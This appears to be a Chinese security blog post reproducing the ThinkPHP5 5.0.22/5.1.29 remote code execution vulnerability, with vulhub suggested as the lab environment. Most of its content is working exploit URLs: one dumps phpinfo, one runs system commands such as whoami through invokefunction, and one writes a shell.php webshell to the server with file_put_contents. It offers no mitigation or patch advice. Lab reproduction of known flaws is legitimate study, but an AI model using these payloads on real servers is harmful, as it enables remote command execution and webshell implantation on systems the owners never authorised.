ThinkPHP5 5.0.22 / 5.1.29远程执行代码漏洞之复现

Admin 2020-04-26 211人围观 ,发现0个评论 ThinkPHP远程执行代码漏洞ThinkPHP漏洞复现

起因来自php学习群 有一个人发了 自己的网站 群员说 有漏洞  粗略的看一下是Think PHP

说实话Think php 漏洞 蛮多的 比如 dedeccms 如果 dedecms没有漏洞 会很广泛的

think比如:ThinkPHP5 5.0.22 / 5.1.29远程执行代码漏洞 等 

ThinkPHP5 5.0.22 / 5.1.29远程执行代码漏洞之复现 Web安全 第1张

复现环境


thinkphp5.0.22


推荐使用vulhub快速搭建漏洞环境


漏洞payload:


1:/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100
2:index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami


效果如下

ThinkPHP5 5.0.22 / 5.1.29远程执行代码漏洞之复现 Web安全 第2张ThinkPHP5 5.0.22 / 5.1.29远程执行代码漏洞之复现 Web安全 第3张

ThinkPHP5 5.0.22 / 5.1.29远程执行代码漏洞之复现 Web安全 第4张


写入文件的payload:

/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=加你要写入的文件内容url编码


请发表您的评论
请关注微信公众号
微信二维码
不容错过
Powered By 蚁人博客